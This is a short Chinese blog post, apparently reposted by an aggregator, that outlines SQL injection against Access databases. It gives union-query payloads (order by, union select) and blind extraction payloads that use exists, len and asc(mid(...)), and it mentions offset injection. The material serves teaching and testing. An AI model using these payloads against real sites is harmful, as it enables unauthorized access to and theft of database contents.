sql注入--access

Posted 喋云怡雪

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入--access相关的知识,希望对你有一定的参考价值。

access数据库结构:

  表名  -->  列名  -->  数据

access注入攻击片段

  联合查询法:

    (1)  判断注入点:  ?id=1 and 1=1 ; ?id=1 and 1=2

    (2)  猜解表长度:  ?id=1 order by 3

    (3)  猜解表名:  ?id=1 union select 1,2,3 from 表名 

    (4)  猜解列名:  ?id=1 union select  列名,2,3 from  表名

    (5)  猜解数据

  逐字猜解法:

    (1)  查表:?id=1 and exists (select * from 表名)

    (2)  查列:?id=1 and exists (select 列名 from 表名)

    (3)  查数据:1.确定长度

            ?id=1 and (select top 1 len(列名) from 表名)=5

          2.确定asc数据(asc编码)    

            ?id=1 and (select top 1 asc(mid(列名,位数,1)) from 表名)=97

  其他方法:

    (1)字典文件收集(社工)

    (2)Access偏移注入

以上是关于sql注入--access的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入分类有哪些,一看你就明白了。SQL注入点/SQL注入类型/SQL注入有几种/SQL注入点分类

sql注入漏洞都有哪些

关于SQL注入

sql注入一

sql 注入是啥?

如何判断是不是存在SQL注入以及注入类型?